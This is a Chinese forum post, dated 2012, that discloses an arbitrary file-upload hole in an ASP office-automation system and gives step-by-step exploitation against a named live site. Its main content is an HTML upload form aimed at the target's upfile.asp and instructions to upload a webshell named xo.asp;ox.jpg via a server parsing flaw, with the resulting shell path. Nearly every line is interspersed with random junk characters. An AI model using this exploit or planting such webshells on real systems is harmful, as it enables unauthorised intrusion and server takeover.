全能OA办公系统 上传漏洞
4 {. G* D7 t: I. J+ X1 X' P6 [, H
! g+ r4 Z- g* V5 W% S系统介绍:! m8 [1 P2 A! D3 V
* {4 k6 H9 ]8 E# ?% u1 }6 c9 A' x全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。% A0 R2 T6 n u7 b
4 Q6 k' K% b5 @8 L$ {) Z9 s主要功能:
/ v1 J9 d" Z: v: N/ }公司通告 . o% X, j* j! C" l7 q! h
工作计划
9 x. O' }# P+ r/ ~; B' {$ B通讯助理 & j `) |7 i% R/ h( D1 d1 ]5 {8 S4 u
客户资源 7 R: Z6 G+ M/ u2 F- ^& X2 T( ^1 _
我的公文 / r7 q2 B) P! w1 ]3 j+ s: D
公文传阅 0 m' ^( Y1 {# l0 g5 W8 }
公共资源
# }: E- P B& r- C& |资源预约 5 y. b; I, o% \7 n: B0 n# O
今日考勤 " s. k$ F& u/ c/ S
个人计划 ! t% N, K6 E9 b, W' y+ J% t/ y% h
个人通讯录 2 N/ i+ w$ a. ~+ E" [. X
个人基本档案 - y' s4 p/ ?; M& a( P
未读邮件
6 k. ^3 a3 n8 g$ V8 S4 X: A# k发邮件
) ~9 T+ r) {4 S1 @收件夹 + P" s4 q) V4 O9 R+ t
寄件夹
3 N9 \9 p, r; }. K. p' V/ Z) f网络硬盘 & w: C9 a- V8 y! p/ S
网络会议 " J* {0 f0 r# u, T$ r
网络调查
8 N' M! s3 a! d8 I. _. K* X' ?交流论坛
g% _: N4 D9 e
( s, d9 @( Y5 p4 z有兴趣测试的朋友可以下源码看看: Z. h0 _5 o6 W: U& X) {# q
9 t6 a/ D( u3 K" T% b# l源码下载:
- b9 r( ?; i- @ t( j
( C$ R1 s; Y. A! k4 h" m) nhttp://www.mycodes.net/30/4750.htm0 S0 C/ E y3 A: Y! z
2 E0 J2 q: e: X漏洞介绍:. l4 f5 Y5 R; m) P5 p p% B% G
7 H! W% e" Z; X. A! ^
由upfile.asp上传文件漏洞引起) |1 @0 t5 u1 O$ K4 d
+ ^! S# f! J5 p0 o7 ~$ C! t+ W测试方法:
9 h) D# r. m% o9 p$ T, g7 y' P5 A6 [/ g
使用名小子上传http://www.itlynn.com/upfile.asp即可
8 o6 C1 W8 L3 h; Y, X( U5 \; Y, K O
如果upfile.asp文件被删除不存在。
* A, e+ [- m1 J; F: F' j0 n$ U. G7 m
那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。& W+ |3 Y# Y2 G2 L) m* i$ W" e
/ S' D; v- R: J( D' `9 \6 O
如果存在那么将如下代码保存为upfile.html。+ y9 z. o8 N. K- N- ^% T1 [; U: S$ M
0 T5 Z2 K H+ e. }然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。
$ I9 b- T! x* i6 J+ S8 ^/ a2 W& j; S' y, Z5 }
4 D" a! H7 w/ ]4 s4 n0 @% u x+ ^- k5 f6 j1 v( @- [
01 <table border='0' align="center" cellpadding="5"> ' ]$ _! R5 x4 B- n* l& T
* X& B3 B' m; w9 U+ U02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> }6 _. Z+ l4 ~# Y2 J* x- T
6 o, J7 q) N8 Y3 G+ S$ o
03 <tr>
: J5 z4 D' X' y+ n/ j. `! m: D# Y0 p3 P; G$ H
04 <td>报错:</td> : M6 J5 f* V& A1 ?. ~# Q" [5 _
. V7 H' E6 y2 w: r05 <td><input type='radio' name='errnumber' value='0'>
% z l; t. E3 @
1 T, n. o3 ^0 i2 D1 y7 z, C' P6 S06 自动更名
6 o6 W3 x3 y- G3 ?5 W. |! b, m" `, @- {& i; n5 s* R
07 <input type='radio' name='errnumber' value='1' checked> ! Q7 v- b. Z; e
) t1 A$ I' Q3 Y7 j08 报错方式
4 f3 n4 R' x* y7 _7 k& Q- n* k! @5 o) e0 E) x
09 <input type='radio' name='errnumber' value='2'> ! ~2 T& o$ P( \# G3 R$ N
1 U1 M2 `- R4 L) P$ w) a9 V10 直接覆盖</td>
( w" o+ v# N! i/ p% s( F( b( u. p! T0 W( j* | j
11 </tr>
5 p! ~# P0 S Q7 p( E; h- G+ V
12 <tr>
. @8 Q0 z1 _9 _8 Y# m; ?, [0 R: @2 z& _. @
13 <td>主题:</td>
3 X, E/ ~3 ^- J- P" n. }, @8 q* H1 }3 K% E
14 <td><input type='text' name='filename' size='30'></td> 7 r3 e; E! f9 x2 D5 t$ e
4 h, p' I) _. l6 F$ F
15 </tr> 9 X0 R. ~% N4 D5 Q, Z5 G. F
0 ], d% s1 }) M16 <tr>
* v1 Q' c) D- @1 H( Q5 w6 E
; I2 \; v, U V: d: |17 <td>文件:</td> 2 O* J2 V; W0 t" w8 E7 |; h, d4 f% _
/ x2 O' r5 g( T/ e. `; }- S1 V
18 <td><input type="file"name="fruit"size="30"></td>
" H) i' {4 c4 U3 }' P; I' w; K) t" j
19 </tr>
4 Z/ C) ^/ w. H) d0 x( Q+ S: d' @" K3 f8 \
20 <tr>
1 x) e1 G2 ]! y, b
( }/ E) J. A7 r4 T, S! O1 K21 <td valign='top'>简介:</td> . D1 P& P }* z o
: r- H5 e( b/ e/ k6 w22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
1 }2 s- d$ ^3 b' m6 a6 y, x4 F" Y: X4 T$ S
23 </tr> # c$ a) ~* f7 l C
0 e* W; Q7 t2 C( Z0 ~5 O4 v24
6 B5 X5 R6 ~" Q$ S
; s% r) n H$ @1 q25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> 3 ~" ]+ d$ d( L1 j1 R0 X
6 w5 ?0 ^! ]3 v, r
26 </tr> . P' Q; ]9 X! l& g( O
, }. x7 a" [$ x$ b& Q$ C9 S' T. j
27 </form> - z7 S, }/ f' w
2 r! ]' z6 f' e( N9 e9 S6 ~! p* d
然后打开上传一个文件名为xo.asp;ox.jpg的文件。! r2 R, b3 A G
) U7 g( d4 U; L5 ]- Q1 x $ t7 K3 Y3 r( a; y3 u# O/ [% `7 U+ q% L
% V" ?7 d) a" P, Y' X1 [5 q
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg) l1 ], j6 J8 x) \7 d
2 M% z; A: b4 V
此漏洞需要配合解析漏洞利用。" [# u" ~! `! f ~* c, ~
# H5 k( g/ Z- Z5 x# _
|
发表于 2012-11-21 13:45:12
收藏
支持
反对